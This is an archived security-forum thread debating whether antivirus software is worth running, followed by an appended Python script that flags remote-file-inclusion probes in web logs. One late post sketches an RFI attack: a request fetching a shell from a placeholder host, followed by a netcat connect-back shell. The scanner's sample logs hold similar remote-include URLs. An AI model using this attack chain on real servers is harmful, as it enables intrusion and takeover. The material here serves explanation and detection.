Security Forums

Anti-Virus - Is it really worth it?

Networking/Security Forums Index -> Viruses // Worms
graycat (SF Mod)
Joined: 29 Apr 2005 | Posts: 16777195 | Location: London, UK
Posted: Wed Dec 03, 2008 4:47 pm    Post subject: Anti-Virus - Is it really worth it?

As a long-time Windows user my default position was always to put an anti-virus and a software-based firewall on my machine as a matter of course. Recently I've been re-evaluating this stance somewhat, but I no longer have a "personal" Windows machine, having moved to Macs. However, Apple's recent announcement that they are recommending users start using an AV product, if only to make things more difficult for virus designers, has made me think again about why to actually use an AV product.

Upon thinking about the whole AV application thing and ignoring OS differences (this will not be a "my OS rocks coz we don't get viruses, n00b" post! :) ) I would think that if some basic security steps were implemented then you would be immune to the vast majority of virus attacks. Such things as never running as a privileged account unless absolutely needed, and certainly not surfing the web as an admin. Being aware of what you've got on your machine and what it does would also be a key step in my opinion. For example, you won't be susceptible to attacks aimed at v7 of Adobe Reader if you're running v9, or even something else for your PDF viewing.

So what do people think? Should you have an AV solution installed? Should only non-techies really need it, while those that are "techie aware" should be fine without, as long as they're awake?
Fire Ant (Trusted SF Member)
Joined: 27 Jun 2008 | Posts: 3 | Location: London
Posted: Wed Dec 31, 2008 10:47 am

graycat,

Some interesting points. I certainly think that
Quote:
Being aware of what you've got on your machine and what it does would also be a key step in my opinion.
This was easier in the days of DOS or even 3.1; today, between Vista and the crap manufacturers put on PCs, it is impossible to know what's going on in the background. Unfortunately, I think it is a catch-22 situation.

As a Mac user I have AV installed (corporate policy) but I have never had an alert to date. If I had a Windows PC I am sure that I would get plenty of alerts, mainly from websites. In this (promiscuous) age of inter-device communication AV is essential for everyone.

Matt_s
susr (Just Arrived)
Joined: 15 Nov 2008 | Posts: 0
Posted: Wed Dec 31, 2008 4:57 pm

matt_s wrote:
Quote:
it is impossible to know whats going on

We can improve our understanding of systems, but it seems to be impossible to truly have a complete understanding of the intricacies of modern computers. We can perpetually keep abreast of current and commonly known issues, but what about the unpublished or non-mainstream issues?

I believe graycat is right that basic security steps will protect you from the vast majority of attacks, but is being protected from the vast majority enough?
larsmhansen (Trusted SF Member)
Joined: 11 Jan 2003 | Posts: 0 | Location: Boston, MA, USA
Posted: Thu Jan 01, 2009 12:53 am

Anti-virus software is like life insurance. When things are a-ok, it seems like a waste, but when the **** hits the fan, it's a good thing that you had it.

With a former employer, we had AV software on everything. PCs, servers, NetWare servers and Macs.
alt.don (SF Boss)
Joined: 04 Mar 2003 | Posts: 16777079
Posted: Thu Jan 01, 2009 1:24 am

I would argue that an educated user does not need a/v software. That said, not every user is an educated one. Due to that lopsided statistic having a/v running at an enterprise level is still required.
Groovicus (Trusted SF Member)
Joined: 19 May 2004 | Posts: 9 | Location: Centerville, South Dakota
Posted: Thu Jan 01, 2009 3:47 am

Quote:
I would argue that an educated user does not need a/v software.

I have come to mostly agree with that. I don't have any sort of active scanning happening on any of my systems, except my email server. Even that seems to be pretty much a waste anymore, though, because all of the suspicious email that I see tends to have links to infected websites. I have both of my browsers locked down, so nothing is allowed to run that I do not explicitly allow to run. I keep all of my software updated. The only time I use my AV is to scan downloaded files.

The problem lies in recognizing whether or not one is an educated user.
capi (SF Senior Mod)
Joined: 21 Sep 2003 | Posts: 16777097 | Location: Portugal
Posted: Thu Jan 01, 2009 9:35 pm

What alt.don and Groovicus said.

Although I would add that A/Vs in servers seem particularly like a waste of resources... or a sign that something's terribly wrong in the first place. A server shouldn't be downloading random crap or running weird programs to begin with.

I remember a quote by someone in this forum (don't remember exactly who it was right now, sorry) which fits perfectly into this situation. To paraphrase: an admin saying "thankfully the server was running an A/V" is akin to a school principal saying "thankfully the teacher was wearing a condom". Sure, that may be better than the alternative... but it kind of reveals a deeper (and much more worrying) problem, wouldn't you say?

It's like the whole GUIs-on-servers thing; the reasoning behind that has always eluded me, and I'm starting to think both issues may be related. You put a GUI on a server (i.e. you install Windows on it) and people start to treat it like their normal computer at home. They start to use it to do their computing, because it's right there, and you just needed IE to check out a quick site, or MSN or Solitaire or whatever. Then crap starts to happen.

Frankly, I blame the whole "dumb things down" mentality brought on by a certain well known OS manufacturer...

People insist on using pointy-clicky software on servers, fancy magical GUI configuration front-ends, graphical remote shells, Internet Explorer, My Computer and all that bloat, when the cold fact is a server isn't a workstation... Don't treat it as one. A server is a blade on a rack. You access it through a remote shell. If the network is down, you access it through a serial console. If the OS is down and you need to repair or reinstall it, then you hook up a monitor and a keyboard. Otherwise, all you need is a remote shell. No, not a fancy graphical shell that requires the server to run a window manager (GUI) that takes up more resources than the server software it was supposed to run. I'm talking about a remote command prompt. Yes, the scary command-line prompt, that's all you need. Really. If whichever server software you're running can't be configured from the command-line, then that server software is broken by design.

My Computer and pointy-clicky amenities are all fine and practical for your workstation, but a server has a single purpose and that's it. It has no place wasting resources running a window manager to begin with, let alone running untrusted programs, or anything other than what it was meant to run.
AdamV (SF Mod)
Joined: 06 Oct 2004 | Posts: 24 | Location: Leeds, UK
Posted: Fri Jan 02, 2009 1:04 pm

I use anti-virus software to keep the elephants away and so far it has proven very effective. I can't remember the last time I got attacked by an elephant.

Giving people too many privileges is usually the weak point. Local admin rights is a particular bug-bear of mine. UAC in Vista can help with this in some situations so that you can isolate the rights to the application that needs them, but in many cases the same apps which have been badly written and tested so they require local admin will not "play nicely" with UAC either.

I don't run AV on any of my work or personal systems (I have run a couple of products in the past, but the maintenance far outweighed the benefit in the end).
For my clients the advice is simple: limit your users' rights. If you absolutely have to give local admin rights to some users, do this properly (e.g. using the interactive account, so they each only have those rights on the machines they are physically logged on to rather than on all others across the LAN).
If any user has local admin rights, they probably need an AV system to give you some chance of an early warning, but this may not stop an infection (like having a burglar alarm but leaving your doors unlocked and windows open).
If people have local admin rights, expect some malware at some point and plan for it. Make sure you can restore systems and data rapidly to a known good point.
An effective spam filter product or service will remove most malware-laden email (even without a specific AV plugin). Ban webmail (hotmail etc) with an enforceable policy (with actual consequences from HR) backed up by technology (your firewall should actually prevent access to such sites).
Educate your users. With sticks if necessary.


The usual slippery slope goes something like:
"This third party application only works if all users run with administration rights. There is a better-written competing product which works without this but it would cost $3 per seat more than this kludged together, back-bedroom effort which the PHB bought after a long lunch with a sales rep"
"So we gave our users local admin rights. The easy way - we just put "Authenticated Users" in the local admins group on all machines using Group Policy - huge time saving.

Then someone used their machine to access their personal hot/g/yahoo/foo-mail service (despite our policy outlawing this) and opened an attachment which turned out to be malware.
The user clicked seven "OK" messages to allow it to install, steal their address book and spread throughout our entire network. Of course they ignored every bit of training, memo, policy and email from the IT department they had ever been given.
They thought their machine was running a bit slow so they forwarded the email and attachment to everyone in their department, saying "my friend says this video is really funny but I can't view it as my machine is playing up - can you try to open it and let me know so I can watch it, thx".
One of them forwarded it to IT to ask for their help because they could not open it either. IT could not read the message because by then the email server had fallen over with excess RPC traffic.
That's when we realised the policy we used to change the local admins group had been applied to all machines including our DCs, mail servers and corporate databases including the finance server, and everything was more riddled with infection than an overripe blue cheese. We had to roll back to the previous night's backups which took IT all weekend and lost a whole day's work and email in the process.
Our auditors said that this would not be good from a SOX perspective, so the IT support manager was sacked, even though he did not buy the product. The user kept their job because they argued that the system should have stopped them doing it if it was not allowed.

The PHB went on and bought an antivirus solution from the same sales rep. It requires local admin rights in order to install the daily updates, so we left our users as members of the local admin group. It cost a lot more than $3 per seat.
Because the AV product is really resource-hungry, some users can't work when they have big documents open, so we published a how-to document showing them how to temporarily disable the AV scanning. Of course, this only works because they have local admin rights...
Since installing it we have not had any virus infections. The PHB included this in his annual personal review as a "significant achievement in the last quarter". He got the pay rise he asked for.
He happily ignores the fact that the logs show that no potential infections have been stopped either - in other words the AV software is costing money, reducing productivity, providing no measurable benefit, giving even more inertia to the local admin issue so we may never get that fixed, and providing a false sense of security (any malware worth its name will just disable the product before doing the real damage).

Compare to:
My boss asked me to evaluate a new application. It would not run without local admin rights, so he told the sales weasel to stick it where the sun don't shine and we paid a few thousand more for a better product from their competitor. Three years later it is still running fine, and they provide regular patches and feature updates which we deploy using Group Policy.
A user rang to say they had an error message on their screen when they tried to open an important document. Turned out to be one of those crappy bits of malware pretending to be an invoice, but it completely failed to install or do any harm as it relied on her having admin rights. Lazy script-kiddie losers.
Attended user's disciplinary hearing. Since it was in their corporate email they had not broken any major policies, just been a bit foolish in opening something unidentified without asking for advice first. HR recommended them to have a refresher by attending our security training session which we hold weekly to make sure we cover all new starters.
Went home early.
Burningmace (Just Arrived)
Joined: 09 Jan 2009 | Posts: 0 | Location: United Kingdom
Posted: Mon Jan 12, 2009 10:53 pm

I personally do not use AV software, as I would instantly notice if something was awry (I see my processes list about 30 times every day). I use Firefox 3 for browsing and have the AdBlock Plus extension installed. I also have the Web Developer Toolbar, which allows me to easily disable JavaScript and Java on the target page in case I need to access a page that I suspect may attempt to attack me. Windows Update runs every day too. If I do somehow manage to get malware on my machine, I remove it manually. I think a mixture of using a high quality open source browser, running Windows Update frequently and being smart when it comes to security will pretty much save any Windows installation from infection. If you've got Windows Firewall switched on and you're behind a NAT router it's even better, because malware really struggles to break through those barriers.

However I must mention that 95% of users out there don't use FF, they don't run Windows Update and they don't have a clue about security. In those cases, Anti-Virus software is a very good thing to have. The issue is that more than half of the users out there with AV software don't bother to update their definitions.

Another problem is that all the AV software out there is horrible. I've not found a single one that doesn't take over everything and bog the machine down in bureaucracy. Most of them have disgustingly friendly interfaces too - especially those bits of software that talk about themselves in the first person: "I've put the virus in quarantine for you. Have a nice day!". Ugh, drives me mad.
Fire Ant (Trusted SF Member)
Joined: 27 Jun 2008 | Posts: 3 | Location: London
Posted: Tue Jan 13, 2009 10:39 am

Burningmace,

I have to disagree with some of your points. If you can tell me what each of your 20+ processes, 70+ services and 100+ loaded drivers (this is XP!) do then I will give you a Mars bar. Looking at your process list in no way protects you. It's like looking out your front window for a burglar; chances are the burglar is stealing something from your shed or taking your "BOFH" mug from your kitchen whilst you sleep.

I fail to see how running FF and Windows Update protects users. Remember that Windows RPC hack a few years ago? People were infected before the update was released by M$.

I did some work recently on breaking device control products and I learnt a lot, especially about Windows rootkits. Not the crap stuff you get on Sony CDs but the kernel-layer stuff. You would have to have a crystal ball to tell if this stuff is running. Mind you, AV software would never detect or be able to remove it at this level. I do see this being the future.

Whilst I agree that AV does bog systems down and cause problems, what do you think the solution is for AV vendors?

As a security professional, defense in depth is something that's hammered into you by mentors of the past. At a corporate level anyone who says you don't need AV gets sacked. Can you, as a Windows user, confirm that every download you make does not contain viral code? What checks do you make?

Matt_s
Fire Ant (Trusted SF Member)
Joined: 27 Jun 2008 | Posts: 3 | Location: London
Posted: Tue Jan 13, 2009 11:16 am

I was thinking of a good analogy when I was in the shower. You buy a microwave meal; how do you know it won't make you ill?

You clean your cutlery and work area. But what about the contents of the meal? You cook the meal to kill any bugs, but this doesn't detract from the fact that you are very rarely aware of the provenance of your food. How do you know that someone isn't putting wood chippings in your sausage (that's what you get at Iceland anyway) or even worse?

There are a number of deeper issues, do you trust that small freeware vendor who has that tool you need? Are you sure that they haven't installed spyware in the software? Yes, they could write some custom viral code which the AV doesn't pick up.

Yes I agree that AV software has little use, I would rather cover my arse and not get caught out.

Matt_s
PhiBer (SF Mod)
Joined: 11 Mar 2003 | Posts: 20 | Location: Your MBR
Posted: Mon Jan 19, 2009 6:29 pm

Weirdly and interestingly enough, over the weekend I was browsing a legitimate website using FF with NoScript. Although NoScript blocked all of the scripts, Avast! popped up and stated "Trojan detected - IFRAME something." That made me think - why would Avast scan the site if NoScript would have blocked it (unless of course Avast sits at a lower level than NoScript)!? If people are not using NoScript type applications, I can see where AV could be useful in such exploits.
alt.don (SF Boss)
Joined: 04 Mar 2003 | Posts: 16777079
Posted: Tue Jan 20, 2009 12:02 am

Not sure Phiber, though on another note, I often do all of my browsing using a linux image. Once I am done it is nuked. That said, most viruses apply to Windoze so I guess using Linux makes me a very small target.
susr (Just Arrived)
Joined: 15 Nov 2008 | Posts: 0
Posted: Tue Jan 20, 2009 1:10 am

PhiBer wrote:
Quote:
why would Avast scan the site if NoScript would have blocked it (unless of course Avast sits at a lower level than NoScript)

This happens because NoScript only blocks the execution of scripts; it doesn't stop them from downloading into your temporary files/cache along with the rest of the site (which is not any real danger by itself).
babyface (Just Arrived)
Joined: 17 Jan 2009 | Posts: 0 | Location: Chicago
Posted: Wed Jan 21, 2009 2:41 am

This is back to the whole question of having AV...

Like others have said, if you're a mac or linux user (especially the last) you're pretty much safe. And nothing can beat safe surfing --- opening random emails, clicking on every link, and installing every video codec you're asked to is quite obviously stupid. If you're careful with the way you use the internet, you're pretty much fine.

That said, for those on 'doze, I don't see any reason why you wouldn't have AV. Sometimes, in spite of however savvy or safe you are, there's always a chance that something can go wrong (yeah, that's pretty vague).

In general, there are several great free AV programs that are unintrusive and effective. Just the fact that AV might slightly improve your defenses, I would say, is enough to put it on your computer. For example, a friend of mine uses AVG Free, which may not be great --- but at <60MB of memory usage and an auto-update feature, I'm sure it's better than having no AV.
Kaosu (Just Arrived)
Joined: 03 Oct 2004 | Posts: 0 | Location: United States
Posted: Fri Jan 23, 2009 9:24 pm

A lot of good opinions have been shared in this thread, and I will admit that I only read the first handful of posts; but those posts did miss out on one very valid, and very real point: Modern anti-virus products can be useful on any system due to the simple fact that modern malicious software will often utilize remote exploits to compromise the machine, and then infect it. Without resident protection of an anti-virus then you will not get any type of protection, even if it is old malware utilizing a new exploit.

In the same sense, they can be somewhat helpful when the high-end malware authors utilize 0-day exploits to spread their malware across the Internet. Now, if malware is being spread with a 0-day, the odds are there is no known signature in an AV database - true. However, the heuristics of a modern AV could have possibly alerted you to the malicious behavior of said event. Without it, you would be completely oblivious.

I am not trying to argue that an AV will protect you from 0-day threats, but I am arguing that they could still prove to be helpful in these situations. You may be the smartest user alive, and keep everything up-to-date with browsers locked down, et cetera. But what happens when you're at the store and miss a critical update, or there is no patch available?

This is why most companies deploy AV products on a wide range of computers (workstations, servers, et cetera). Granted, something like Mamutu would be better to run on Windows-based servers since it has a smaller footprint than most AV products, and simply uses advanced heuristics to alert you to potential threats.

AV products should also be used in situations where the server is hosting a web or mail server, simply because RFI exploits are so commonplace, and large PHP applications will generally be vulnerable to more than a handful of remote file inclusion exploits. Basically, when the attackers upload a known set of tools, a web shell or a bindshell, you will want to know about it before they can do any more damage. An anti-virus would detect and delete most of these as they are uploaded. However, servers without anti-virus products will happily store them, and give the attackers enough time to not only compromise your web server, but also root your entire machine, and use trust escalation to attack other computers on the network, or even the router itself.

A perfect example to illustrate my point above is: Almost all anti-virus products will now detect netcat, and label it as a "hack tool". This can be annoying for us that actually use it (just exclude it in the AV), but now let us imagine that mood.php is vulnerable to an RFI attack. I now issue the command mood.php?=http://www.evilhost.com/shell.txt and using that I simply upload shell.php to a writable directory on your server. Now, I use my shell to upload netcat, and then I simply have netcat connect to me to bypass common firewall configurations. I now have an interactive shell that I can use to work on gaining administrative rights to your entire server. Now, if you had an AV running, it would have notified you, foiled my original attempts and you would have been able to figure out what I was doing. Since you didn't, I have since removed any relevant log entries and you think all is great - meanwhile you're now part of some botnet.

note: The above description is meant to be overly vague, and not contain any real technical information.

I believe that not every user needs an AV product to ensure the integrity of their system, but those users will also lose that small layer of defense that could have saved them from a situation like the ones listed above.
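The RFI pattern Kaosu sketches (a script parameter whose value is itself a URL) leaves a recognisable trace in the web server's access log, which a defender can look for whether or not AV is running on the server. The scanner below is an added example, not code from the thread; the log lines, hostnames, script names and the Combined Log Format assumption are all constructed for the illustration.

```python
"""Flag likely remote-file-inclusion (RFI) probes in web server access logs.

Constructed example: parses Combined Log Format lines and reports any
request whose query string carries a value that points at a remote
resource (http://, https://, ftp://, php://, data:). Every host, path and
log line here is made up for the demonstration.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Combined Log Format:
# ip ident user [time] "METHOD target HTTP/x" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Value prefixes that indicate an include/require target outside the host.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")


def rfi_parameters(target: str) -> Dict[str, str]:
    """Return query parameters whose (decoded) value names a remote resource.

    The scheme check is case-insensitive, but the original value is kept so
    an analyst sees exactly what was requested (including any %00 tails).
    """
    query = urlsplit(target).query
    hits: Dict[str, str] = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.lstrip().lower().startswith(REMOTE_SCHEMES):
            hits[name] = value
    return hits


def parse_line(line: str) -> Optional[dict]:
    """Split one access-log line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan(lines: List[str]) -> List[dict]:
    """Return one finding per request that carries a remote URL in its query."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable lines are skipped, not treated as hits
        hits = rfi_parameters(rec["target"])
        if hits:
            findings.append({
                "ip": rec["ip"],
                "time": rec["time"],
                "path": urlsplit(rec["target"]).path,
                "status": int(rec["status"]),
                "params": hits,
            })
    return findings


# Constructed sample log lines (not real traffic; .example is a reserved TLD).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jan/2009:18:29:01 +0000] "GET /mood.php?page=http://evil.example/shell.txt HTTP/1.1" 200 512 "-" "curl/7.19"',
    '198.51.100.4 - - [19/Jan/2009:18:29:05 +0000] "GET /mood.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Jan/2009:18:29:09 +0000] "GET /index.php?inc=HTTPS://evil.example/c.txt%00 HTTP/1.1" 500 0 "-" "curl/7.19"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} status={f['status']} params={f['params']}")
```

A hit with a 200 status deserves more attention than one with a 500, since it suggests the include actually succeeded; either way the next step is checking the web root for newly written files.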